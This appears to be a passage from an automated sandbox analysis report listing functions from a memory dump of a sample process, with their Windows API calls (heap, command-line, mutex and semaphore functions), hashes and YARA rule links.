                                                          • Instruction ID: 375825faae0b6b74936492638b01e880b00592f4e50410b1a0a1531a5f9ac5c2
                                                          • Opcode Fuzzy Hash: de053a9d3eb23efd5fb403868795c2873a637a044f3de3db5eaff919a7707501
                                                          • Instruction Fuzzy Hash: 0A318B75A003009FCB659F69C485A9ABBF6EF48310B14866EED4A8B712EB70E904CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0006A25E Relevance: 9.0, APIs: 7, Instructions: 228memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 0006A28A
                                                          • GetProcessHeap.KERNEL32(00000000,?,000698B0,?,?,000698B0,00000001,00000000,00000000,?,?,?,?,?,000698B0,?), ref: 0006A316
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,000698B0,?,?,?,?,00000001,?), ref: 0006A31D
                                                          • GetProcessHeap.KERNEL32(00000000,000698B0,000698B0,?,?,000698B0,00000001,00000000,00000000,?,?,?,?,?,000698B0,?), ref: 0006A326
                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,000698B0,?,?,?,?,00000001,?), ref: 0006A32D
                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,000698B0,?,?,?,?,?,000698B0,?,?,?), ref: 0006A4C6
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,000698B0,?,?,?,?,?,000698B0,?,?,?,?,00000001), ref: 0006A4CD
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                          • Associated: 00000007.00000002.4443192720.000000000006D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_60000_control.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free$Allocmemset
                                                          • String ID:
                                                          • API String ID: 4078862186-0
                                                          • Opcode ID: a306bcd6dcfbdb825125c4beaa1d283acef3ed511476a63319cf5410907ee496
                                                          • Instruction ID: be718fbadbcf5d711ef7888985417395ab1a919616697713b7d472d4c61b6814
                                                          • Opcode Fuzzy Hash: a306bcd6dcfbdb825125c4beaa1d283acef3ed511476a63319cf5410907ee496
                                                          • Instruction Fuzzy Hash: EB816DB1E002159FEB14DFA9C894ABEB7F6FB49300F14812AE815EB241E774D941CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00063830 Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCommandLineW.KERNEL32(?,00000002), ref: 0006383A
                                                          • StrTrimW.SHLWAPI(-00000002,00061420), ref: 00063862
                                                          • memset.MSVCRT ref: 00063870
                                                          • GetStartupInfoW.KERNEL32(?), ref: 0006387C
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0006388F
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                          • Associated: 00000007.00000002.4443192720.000000000006D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_60000_control.jbxd
                                                          Similarity
                                                          • API ID: CommandHandleInfoLineModuleStartupTrimmemset
                                                          • String ID:
                                                          • API String ID: 1556929265-0
                                                          • Opcode ID: 5e43f5a06a1cc762f51c8f58e460d92b10efbf2d862b774f12aae32e3349f886
                                                          • Instruction ID: 13307c9826bef37a6d767d85bba1ea840852a1cc86d5d04d11d030b954548ec1
                                                          • Opcode Fuzzy Hash: 5e43f5a06a1cc762f51c8f58e460d92b10efbf2d862b774f12aae32e3349f886
                                                          • Instruction Fuzzy Hash: 1701D672E003149AEB70A7518C45BEE77B69B45711F15001AFE45A3181DF649E86C6E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00065252 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32(00000040), ref: 00065273
                                                          • CreateMutexExW.KERNEL32(00000000,?,00000000,001F0001), ref: 000652A7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                          • Associated: 00000007.00000002.4443192720.000000000006D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_60000_control.jbxd
                                                          Similarity
                                                          • API ID: CreateCurrentMutexProcess
                                                          • String ID: Local\SM0:%d:%d:%hs
                                                          • API String ID: 3937467467-4162240545
                                                          • Opcode ID: 816af98038cc59fbcdae1af7542f2f5cc1bd1bbc014d9d8943f7abceb7db9abc
                                                          • Instruction ID: 4286c31d66283a2a664e77c7cd8155e5f774b2571312b46c0f8efecbfb967264
                                                          • Opcode Fuzzy Hash: 816af98038cc59fbcdae1af7542f2f5cc1bd1bbc014d9d8943f7abceb7db9abc
                                                          • Instruction Fuzzy Hash: 53315671D4062D9BDB20EF64DC89ADDB7BAEF14740F1045E9E50997242EBB09F848F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00068C42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSemaphoreW.KERNEL32(001F0003,00000000,?,_p0), ref: 00068C92
                                                          • GetLastError.KERNEL32 ref: 00068CA2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                          • Associated: 00000007.00000002.4443192720.000000000006D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_60000_control.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastOpenSemaphore
                                                          • String ID: _p0
                                                          • API String ID: 1909229842-2437413317
                                                          • Opcode ID: fb73dcfdf7f14beb4bddf14e1147094db93e54d15db447d8fbadf63cfa46e2cb
                                                          • Instruction ID: a936288723ab8edc184d4b9df4df5baf3af3c556e90169ff5f7e46d86ff6dbe3
                                                          • Opcode Fuzzy Hash: fb73dcfdf7f14beb4bddf14e1147094db93e54d15db447d8fbadf63cfa46e2cb
                                                          • Instruction Fuzzy Hash: 5E21A5706011289BD720EF24C999AEE77B7EF54310F1082A9F80997241DE709E41CB71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%